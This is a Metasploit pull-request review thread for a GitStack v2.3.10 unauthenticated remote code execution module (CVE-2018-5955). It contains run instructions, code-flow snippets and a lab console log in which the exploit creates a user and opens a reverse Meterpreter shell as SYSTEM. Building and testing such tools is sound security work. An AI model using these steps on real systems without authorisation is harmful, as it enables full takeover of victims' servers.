Gitstack v2.3.10 RCE

[jrobles-r7]

This module exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits.

Verification

• Install a vulnerable GitStack application
• ./msfconsole
• use exploit/windows/http/gitstack_rce
• set rhost <rhost>
• set verbose true
• run

[jrobles-r7]

I need to add references... 🤦‍♂️

[wvu]

?

[wvu]

It runs as SYSTEM?

[jrobles-r7]

It does run as SYSTEM.

[wvu]

D:

[wvu]

Kinda don't need normalize_uri if you have a static URI like this.

[wvu]

Rex::ConnectionError catches a lot of this.

[wvu]

res.get_json_document?

[wvu]

vars_post instead.

[wvu]

Is there a reason for this? I don't see anything that needs encoding in the URI?

[wvu]

Might want to let the user know what this magic number means.

[wvu]

You can use empty?. Or even blank? if you like.

[acammack-r7]

Either we want an extra blank line above this, or remove this line if we get RPORT from the HttpClient mixin.

[wvu]

I glossed over this. Good change.

[pbarry-r7]

Maybe consider flipping this logic around per the style guide: https://github.com/bbatsov/ruby-style-guide#no-else-with-unless

[pbarry-r7]

Same nit as above (https://github.com/bbatsov/ruby-style-guide#no-else-with-unless)

i.e.

if !r_users.blank?
  pwn_user = create_user
  if pwn_user
    mod_user(pwn_repo, pwn_user, 'POST')
    run_exploit(pwn_repo, pwn_user, command)
    mod_user(pwn_repo, pwn_user, 'DELETE')
    delete_user(pwn_user)  
  end
else
  pwn_user = r_users[0]
  run_exploit(pwn_repo, pwn_user, command)
end

You could also use if r_users.present? instead of if !r_users.blank?, as it's just an inversion of the return value of the .blank? method (but is less common in the Metasploit code; .blank? is more common).

[pbarry-r7]

Nice module, @jrobles-r7 ! I'll see if I can get GitStack installed this afternoon for testing... 💯

[pbarry-r7]

"...vulnerability in GitStack through version v2.3.10" maybe? https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955

[pbarry-r7]

My comment was really around the fact that the CVE says that all versions up-to-and-including v2.3.10 are vulnerable. The current verbiage sounds like it's only version v2.3.10 which is vulnerable, which is not the case according to the CVE.

[jrobles-r7]

Oh ok. I didn't want to say the "... module exploits... through version v2.3.10" since I didn't test the exploit against earlier versions of GitStack.

[wvu]

It's normal to list vulnerable versions and tested versions, too.

[wvu]

"Versions X-Z are vulnerable. Tested on version Y." Something like that.

[pbarry-r7]

Works for me when targeting my Windows 10 system:

pbarry@ubuntu-16:~$ msfconsole

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.45-dev-                        ]
+ -- --=[ 1744 exploits - 996 auxiliary - 302 post        ]
+ -- --=[ 529 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/http/gitstack_rce
msf exploit(windows/http/gitstack_rce) > set RHOST 192.168.2.109
RHOST => 192.168.2.109
msf exploit(windows/http/gitstack_rce) > set verbose true
verbose => true
msf exploit(windows/http/gitstack_rce) > run

[*] Started reverse TCP handler on 192.168.2.106:4444
[*] Powershell command length: 5963
[+] Web interface is enabled
[+] Repositories found
[+] Created user: KZqpR
[+] User KZqpR added to AMBdK
[+] KZqpR removed from AMBdK
[+] KZqpR has been deleted
[*] Sending stage (179779 bytes) to 192.168.2.109
[*] Meterpreter session 1 opened (192.168.2.106:4444 -> 192.168.2.109:52447) at 2018-03-11 12:10:22 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : PB-LAPTOP
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

But I dawdled too long, lost my committer rights (womp womp)... So FWIW to others, it worked for me. :)

[wchen-r7]

Release Notes

The exploits/windows/http/gitstack_rce module has been added to the framework. It exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits. You may have to run the exploit more than once to generate a small enough PowerShell.